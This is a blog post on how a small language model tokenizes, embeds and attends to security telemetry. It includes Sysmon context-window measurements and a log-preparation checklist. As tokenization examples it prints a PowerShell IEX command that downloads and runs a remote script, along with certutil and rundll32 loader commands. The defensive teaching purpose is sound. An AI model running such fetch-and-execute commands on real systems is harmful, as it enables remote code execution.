AI detection engineering
Understanding How LLMs Process Security Telemetry
What a language model actually does with a command line, measured on Phi-4-mini and on two days of real Sysmon events, and what to do before you paste telemetry into one.
Disclosure: I work at Microsoft, working on Defender. This is independent research.
On this page · 11 sections
Paste a run of SOC logs or Windows process-creation events into a large language model (LLM), and it quickly hands back a story of what the activity appears to be.
What happens inside the model is less clear. For practitioners without a data science background, the model is a black box where text goes in and text comes out. That is fine for routine triage. It gets risky when a model invents a parent-process relationship, assigns a 95 percent malicious verdict to a legitimate administrative script or returns only a partial summary of a 40,000-event export. If you don’t know the mechanics, failures like these look mysterious when they are actually diagnosable.
There is a second problem, specific to how our industry uses LLMs. Pointing a frontier model at everything is the current reflex, and I think that is the wrong default. Clustering, similarity search and small models trained on your own alerts often cost less and run faster, and they keep your data in-house. That is a topic for another post.
Below, I follow one PowerShell command through tokenization, token IDs, embeddings and contextual representations. Along the way I show why each step matters when you interpret a model’s output or investigate a hallucination.
A Language Model Predicts the Next Token #
A large language model is a neural network trained on a vast corpus of text to predict the next token from the tokens that precede it. To make those predictions, the model must first convert text into numbers.
Earlier techniques such as Bag-of-Words and Word2Vec also represented text numerically. Bag-of-Words records word frequencies, while Word2Vec learns vectors that reflect statistical relationships among words. Modern language models differ in two ways. They split text into subword tokens, and their representations change with the surrounding text.
Text Becomes Tokens Before a Model Reads It #
Command lines, scripts, process-execution logs, network traffic and syslog all have structure a practitioner recognizes at a glance. A language model sees none of it until the text is split into pieces and each piece is mapped to a number.
The first step is tokenization, which does two things:
- Token splitting cuts the input into smaller pieces. Depending on the tokenizer, a piece can be a whole word, part of a word, a single character or a byte.
- Token-to-ID mapping looks up each piece’s number in the tokenizer’s vocabulary.
A Tokenizer Is Not a Parser #
Imagine we’re investigating suspicious PowerShell activity and encounter the following command line in our endpoint telemetry:
powershell.exe -NoProfile -Command "IEX (New-Object Net.WebClient).DownloadString('https://example.com/payload.ps1')"We can immediately identify several interesting components. The command invokes PowerShell without loading its profile, uses Net.WebClient to retrieve remote content and passes the result to IEX (Invoke-Expression) for execution.
But what does a language model actually see when we provide it with this command?
To explore this, I used Microsoft’s Phi-4-mini-instruct model (Phi-4-mini for short) and its corresponding tokenizer. Here is the actual tokenization output:
['powers', 'hell', '.exe', 'Ġ-', 'No', 'Profile',
'Ġ-', 'Command', 'Ġ"', 'I', 'EX', 'Ġ(',
'New', '-', 'Object', 'ĠNet', '.Web', 'Client',
').', 'Download', 'String', "('", 'https', '://',
'example', '.com', '/p', 'ayload', '.ps', '1', "')\""]The tokenizer does not split the command the way a security practitioner would.
For example:
powershell.exeis split into powers, hell and.exe.IEXbecomesIandEX.DownloadStringbecomesDownloadandString.- Even
payload.ps1is divided into several smaller fragments.
You may also notice the Ġ character appearing in several tokens. This is how the tokenizer represents a leading space. It isn’t an additional character from the original PowerShell command.
A tokenizer is not a security parser, and it is not judging whether the command is suspicious. It splits text according to its algorithm and vocabulary, and maps each piece to an ID.
The same fragmentation shows up across other common Windows command lines. Figure 1 shows the tokenizer on four of them. They are an encoded PowerShell command, a certutil download and a pair of rundll32 commands that this post returns to later.
Encoded PowerShell (harmless payload) · powershell.exe -EncodedCommand VwByAGkAdABlAC0ASABvAHMAdAAgAGgAZQBsAGwAbwA=
35 tokens
Certutil download · certutil.exe -urlcache -split -f https://example.com/a.txt C:\Temp\a.txt
21 tokens
Rundll32, routine · rundll32.exe printui.dll,PrintUIEntry /in /n \\fileserver\HP-12
23 tokens
Rundll32, suspicious · rundll32.exe C:\Users\Public\update.dll,DllRegisterServer
17 tokens
Token IDs Are Addresses, Not Meaning #
For the PowerShell command above, Phi-4-mini produces 31 token IDs:
[172083, 10844, 39494, 533, 3160, 9120, 533, 5266, 392, 40, 3922, 350, 3443, 12, 1752, 9352, 12959, 3510, 741, 14282, 916, 706, 4172, 1684, 18582, 1136, 8138, 11341, 76695, 16, 112048]

These IDs do not encode the command’s meaning. Each one is an index into the tokenizer’s vocabulary. It tells the model which learned representation to retrieve for that token.
The embedding layer does that retrieval. It maps each token ID to a vector, a list of floating-point numbers learned during training.
In Phi-4-mini, the embedding matrix contains one 3,072-dimensional vector for each of 200,064 vocabulary entries. The PowerShell command therefore becomes a batch containing one sequence of 31 token vectors, with 3,072 values in each vector.
- Embedding matrix shape: (200064, 3072)
- Command embedding shape: (1, 31, 3072)
The command embedding shape, (1, 31, 3072), can be read as follows:
- 1 represents our single input command.
- 31 represents the number of tokens produced by the tokenizer.
- 3072 represents the number of dimensions in each token’s embedding vector.
The three tokens that form powershell.exe (powers, hell and .exe) each receive an ID that retrieves a separate vector from the embedding matrix.

At this stage, each vector describes one token on its own. It knows nothing yet about the rest of the command.
Embeddings Place Related Tokens Close Together #
Consider two commands that accomplish the same basic task:
Invoke-WebRequest -Uri 'https://example.com/file.exe' -OutFile 'C:\Temp\file.exe'
(New-Object Net.WebClient).DownloadFile('https://example.com/file.exe','C:\Temp\file.exe')Both commands retrieve a remote file and save it locally, even though they use different syntax and share few tokens. Token IDs alone do not express that behavioral relationship. Embeddings are where that relationship starts to show up.
During training, tokens that show up in similar contexts end up with vectors that point in similar directions. These relationships come from statistics, not from any human definition of meaning or security behavior.
A map is a useful analogy. Tokens used in similar contexts sit near each other, and unrelated tokens sit farther apart. The real space has thousands of dimensions rather than two, but distance and direction still reflect what the model learned.
We can check this on the words that carry that behavior, using Phi-4-mini’s own embedding layer. Download, Retrieve and Fetch score between 0.77 and 0.88 in similarity with one another (cosine similarity, where 1.0 means two vectors point the same way). Registry scores 0.59 to 0.68 against each of them, and two random tokens average 0.16. Read these numbers against each other rather than against zero. The download words are closer to one another than to Registry, and all of them are far above two random tokens.
In Phi-4-mini, each token’s vector has 3,072 values, so it sits in a 3,072-dimensional space. Because that space cannot be drawn directly, Figure 4 reduces the command’s token embeddings to two dimensions.

Attention Lets Each Token Draw on the Ones Before It #
So far, every token has a fixed starting vector. The token .exe gets the same embedding whether it appears in an administrative script or in malware, as long as the tokenizer gives it the same token ID both times.
The Transformer layers are where that changes. One of the key components within Transformers is attention, which lets each token obtain information from itself and the tokens that precede it. There is much more to the Transformer architecture, but for now we will focus only on attention, at a high level.
Here is a simple example. I asked Phi-4-mini to continue this sentence:
The wolf jumped over theIts top three predictions were:
- dog: 24 percent
- fence: 23 percent
- lazy: 8 percent
“Fence” is a plausible continuation because wolves can jump over fences. “Dog” and “lazy” may reflect the familiar pattern “The quick brown fox jumps over the lazy dog,” although the predictions alone cannot show whether the model memorized that sentence. In each case, predicting the next token requires the model to use the preceding context (especially “wolf,” “jumped” and “over”) to represent what is being described. Attention is one mechanism that lets the model bring that earlier information into the representation for the final “the.”
For each token, an attention head calculates how much to draw from itself and each earlier token, and those shares add up to 100 percent. Whatever a token draws from earlier tokens comes out of its own share. It can never look at later ones. That is true of Phi-4-mini and of most of today’s large language models. Phi-4-mini has 32 Transformer layers with 24 attention heads each, and different heads learn to look for different things. Each layer passes its output to the next, so by the last layer a token’s vector reflects the context that came before it.
Inside each head, every token gets three vectors. Its query describes what it is looking for, its key describes what it offers, and its value is the information it passes on. The head compares a token’s query with its own key and the key of every earlier token. The better the match, the larger the share. Those shares are the percentages in Figure 5. The token’s new vector is a blend of those tokens’ values, weighted by the shares. If it helps, think of a SIEM search. The query is your search string, the keys are the indexed fields, the values are the event contents that come back, and the shares are relevance scores.
Here is how one head in the last layer divided its attention for the final “the”:

This head puts most of its attention on jumped and over, close to what a person would pick. I chose it because it was the clearest example. Other heads spread their attention differently.
Two things in these examples are easy to misread. First, attention weights are not the model’s prediction. The 41 percent on jumped in Figure 5 describes how one head mixed information inside the model. The 24 percent for dog, from the prediction list above, is a different number. It is calculated once, after the last layer, in a final step called the language-model head (LM head), which scores every token in the vocabulary.
Second, attention does not explain a decision. An attention map shows where one head looked, not why the model reached its answer. When researchers compared attention with other ways of measuring what drove a prediction, such as removing a word and checking whether the answer changes, the two often disagreed. If a product demo highlights the tokens an AI “focused on” to justify a verdict, treat it as an illustration, not evidence.
A command containing powershell.exe or certutil.exe is not malicious on its own. Whether it is suspicious depends on the arguments it was run with and on the rest of the event, such as which process launched it and which account ran it. Attention is how a Transformer brings that context into each token’s vector, and the next section shows it happening on two rundll32 commands.
Attention can only draw on what is actually in the model’s input, though. If the parent process isn’t there, the model can’t weigh the real one. It may fill the gap with a likely-sounding parent drawn from patterns it learned in training, which is how the invented parent process from the opening happens. A field you leave out of the prompt is a field the model cannot check, which is why the checklist at the end keeps ParentImage and ParentCommandLine.
Context Changes a Token’s Vector, but Only Looking Backward #
After the last layer, each token has a contextual embedding. The same token can now carry different numbers in different commands, depending on what came before it.
To see context at work, we need the same token in two different commands. Here are two rundll32 commands that start the same way and then diverge, one routine and one not:
rundll32.exe printui.dll,PrintUIEntry /in /n \\fileserver\HP-12
rundll32.exe C:\Users\Public\update.dll,DllRegisterServerBoth contain .dll, and both begin with the same five tokens, r, und, ll, 32 and .exe, which spell rundll32.exe. For each shared token, we ask how similar its vector in the first command is to its vector in the second. This is a different measurement from Figure 5. Figure 5 showed how one word splits its attention within a single sentence. Here we compare the same token across two different commands. We ask at layer 0, which is the static embedding from earlier, and again after each of the 32 Transformer layers. A score of 1.0 means the two vectors point the same way. The lower the score, the more they differ.

- At layer 0, every shared token has a similarity of 1.0. The embedding layer is a lookup table, so the same token always starts with the same vector.
- Across all 32 layers, the five tokens in
rundll32.exestay at 1.0, because both commands contain identical text up to those positions. As in Figure 5, each token draws only on itself and earlier tokens. The model can’t look ahead to where the commands diverge, so it produces the same blend in both. - The
.dlltoken is the exception. It drifts apart between the two commands, because it draws on different earlier text. In one command that isprintui. In the other it isC:\Users\Public\update. The similarity falls unevenly to 0.69 at layer 30, then climbs back to 0.81 over the last two layers. Figure 7 shows what.dlldraws on in one middle layer.

Set aside the first token and .dll itself in Figure 7, and the rest of the attention is spread thin, a few percent per token. Among those tokens, the routine command gives the largest shares to ui and print. The suspicious command gives them to C and update.
A similarity of 0.81 does not mean the command is 81 percent malicious. These representations were never trained to classify commands. The score only says the two .dll vectors now differ.
The rundll32.exe result has a practical consequence for prompting most large language models. Each token is processed using only the tokens before it. If the task appears only after the data, the model reads that data without knowing the task. It can still look back at the data while it answers, which is why vendors recommend ending with the question. Stating the task before the data as well gives the data the right context from the start.
A Verdict Score Is Generated Text, Not a Probability #
At the start of this post, a model gave a legitimate administrative script a 95 percent malicious verdict. Let’s look at where that number comes from.
At every step, a language model has one objective, which is to predict the next token. Reasoning models and agents repeat that step as well. Therefore, when you ask a model to rate a command from 0 to 100, no detector inside it computes a risk score, unless you have connected it to an external scoring tool. It writes “95” the same way it writes any other word, because its token is a plausible continuation of your prompt. The model does compute probabilities, as the dog example showed, but they are probabilities for the next token and not the chance that a command is malicious. The invented parent process from the opening works the same way. When a model describes a process tree, it writes what plausibly comes next, and nothing forces that text to match the telemetry, especially when the real parent is not in its input.
Measured as a confidence score, the verdict number also falls short in three ways:
- It is not reliably calibrated. A calibrated score is right about 90 percent of the time when it says 90, and stated confidence tends to run high.
- It clusters on round numbers, mostly 80 to 100 in multiples of five, likely because that is how people write confidence.
- It can change between runs, even with settings meant to be deterministic.
If you need a score to alert on, use something built to produce one, such as a classifier trained and tested on your own data, with a specified threshold. A 2026 study of reasoning-model triage on real Windows endpoint detections reached the same conclusion. The model’s confidence scores were only usable after training a separate calibrator. Treat the model’s explanation as a lead to check, and any number in it as uncalibrated until you have tested it against your own outcomes.
Two Days of Telemetry Do Not Fit in Any Context Window #
The opening also described a model returning only a partial summary of a 40,000-event export. The reason is the context window, which is the most text a model can read at once, counted in tokens. For Phi-4-mini that is 131,072 tokens. Set aside about a fifth for your instructions and the model’s answer, and about 104,000 are left for telemetry.
To see how far that goes, I exported two days of Sysmon process-creation events from my developer workstation, which came to 16,248 events in about 52 hours. This developer workstation is busier than most, running build tools, scripts and shells all day, so an office machine will usually log fewer events. I formatted every event five ways, from the raw XML the export produces down to only the fields an analyst reads (listed in the checklist below), and counted the tokens. These counts are not specific to Phi-4-mini. OpenAI’s o200k tokenizer, used by GPT-4o, gives identical counts on this data. Figure 8 shows the result.

The chart shows three things:
- It does not fit. Even trimmed to the analyst fields as key=value, the two days come to 6.8 million tokens. That is 52 times Phi-4-mini’s window, and more than six times the largest windows the major frontier APIs offer today, about one million tokens as of September 2026. The 40,000-event export from the opening is about five days of this one machine. A one-million-token window holds about eight hours of this machine. A typical office workstation starts fewer processes, from hundreds to thousands a day. At about 1,000 a day, it still fills that window in about two and a half days, and a 1,000-machine fleet would produce about 400 windows’ worth every day.
- Format still matters. The raw XML costs a median of 851 tokens per event, and the analyst fields as key=value cost 207. That fits about four times as many typical events in one prompt, and shrinks the whole export about 2.6 times. The gain is smaller overall because long command lines appear in every format.
- Most of it repeats. Only 4,786 of the 16,248 command lines, under a third, are unique. Collapsing repeated command lines alone would remove about 70 percent of the events before a model sees anything.
So something has to decide what to drop. By default, a model’s API rejects a request that is too long. Opt-in settings drop the oldest content or summarize it, and some chat apps switch to searching your data instead of reading all of it. None of these knows which lines matter to your investigation, so prepare the data in your pipeline before it reaches the model.
Encoded payloads make this worse. Across the 1,214 Atomic Red Team command lines, base64 runs at about 1.8 characters per token against about 3.4 for ordinary commands, so it costs about twice as much. Not every model decodes it reliably, and a decoder does it exactly and for free.
Trimming also gives better answers, not just cheaper ones. Models, frontier ones included, get worse as input grows even when the task stays the same, and information buried in the middle of a long input is the easiest to miss.
Before You Paste Telemetry into a Model #
- Keep the fields an analyst reads, which are UtcTime, Computer, User, Image, CommandLine, ParentImage, ParentCommandLine and the process IDs. Use key=value rather than JSON or raw XML.
- Collapse repeated command lines, and keep a count of each. In the export above, under a third were unique.
- Decode base64 first. PowerShell’s
-EncodedCommandis UTF-16LE text, so decode it as UTF-16LE. - Replace GUIDs, temporary file names and other random strings with placeholders. They fragment even worse than base64, at about 1.3 to 1.6 characters per token, and masking them is standard practice in log parsing.
- State the task before the data, and restate the question after it. The model reads the data knowing what to look for, and the question is fresh when it answers. Anthropic and Google both recommend putting the question at the end, and OpenAI found instructions at both ends worked best.
- Treat any confidence number in the answer as uncalibrated until you have tested it against your own outcomes.
The three failures from the opening now have explanations. An invented parent process is the model completing a plausible pattern, often because the real parent was not in its input. A 95 percent verdict is generated text from a model that has never seen your baseline. A partial summary is the context window doing what it must. None of them goes away by pasting in more data. What helps is preparing the input and reading the output as generated text.
What These Measurements Do Not Show #
- One small model. The internal measurements come from Phi-4-mini. Larger models have more layers and heads, but the same tokenizer, embedding lookup and backward-only attention.
- Single examples. One pair of commands and chosen attention heads show how the mechanism works, not how often it happens.
- One machine and one tokenizer. The token counts come from one busy developer workstation, and other tokenizers count differently. Claude’s, for example, produces about 30 percent more tokens.
- Untested advice. The prompt-order advice rests on the mechanism and vendor guidance, not on a measured effect on triage.
Where to Go Next #
A companion Jupyter notebook reproduces every measurement in this post, in the same order as the sections above, and you can run it in Google Colab without installing anything. Only the two attention sections need a GPU. The rest runs on a laptop. The Sysmon export itself stays private, but the notebook’s last section runs the same measurement on your own .evtx file. The most useful next step is to run the static-versus-contextual comparison on two commands from your own environment, one routine and one not.
References #
Research
- Atil, B., et al. (2024). Non-Determinism of “Deterministic” LLM Settings. arXiv:2408.04667.
- He, P., Zhu, J., Zheng, Z., and Lyu, M. R. (2017). Drain: An Online Log Parsing Approach with Fixed Depth Tree. ICWS 2017.
- Hong, K., Troynikov, A., and Huber, J. (2025). Context Rot: How Increasing Input Tokens Impacts LLM Performance. Chroma.
- Jain, S., and Wallace, B. C. (2019). Attention is not Explanation. NAACL 2019. arXiv:1902.10186.
- Khanna, A., et al. (2026). Cybersecurity Detection Classification with Reasoning-enabled Language Models. arXiv:2607.28460.
- Liu, N. F., et al. (2024). Lost in the Middle: How Language Models Use Long Contexts. Transactions of the ACL. arXiv:2307.03172.
- Tian, K., et al. (2023). Just Ask for Calibration: Strategies for Eliciting Calibrated Confidence Scores from Language Models Fine-Tuned with Human Feedback. EMNLP 2023. arXiv:2305.14975.
- Wei, A., Haghtalab, N., and Steinhardt, J. (2023). Jailbroken: How Does LLM Safety Training Fail? NeurIPS 2023. arXiv:2307.02483.
- Xiao, G., Tian, Y., Chen, B., Han, S., and Lewis, M. (2024). Efficient Streaming Language Models with Attention Sinks. ICLR 2024. arXiv:2309.17453.
- Xiong, M., et al. (2024). Can LLMs Express Their Uncertainty? An Empirical Evaluation of Confidence Elicitation in LLMs. ICLR 2024. arXiv:2306.13063.
Documentation and data
- Anthropic (2026a). Context windows. Claude Developer Platform documentation.
- Anthropic (2026b). Pricing. Claude Developer Platform documentation.
- Anthropic (2026c). Prompting best practices. Claude Developer Platform documentation.
- Google (2026a). Long context. Gemini API documentation.
- Google (2026b). Gemini 3 models. Gemini API documentation.
- Microsoft (2025). Phi-4-mini-instruct model card.
- OpenAI (2025). GPT-4.1 Prompting Guide. OpenAI Cookbook.
- OpenAI (2026). Models. OpenAI API documentation.
- Red Canary (2026). Atomic Red Team. GitHub.
- TrustedSec (2025). Sysmon Community Guide: Process Creation. GitHub.
Data & code
- Repository
- henry-parks/research-notebooks at
68e536b13a4e - Notebook
- how-llms-read-security-telemetry-v1.0
- Model
- microsoft/Phi-4-mini-instruct (revision
cfbefacb9925) - Hardware
- One workstation with a single GPU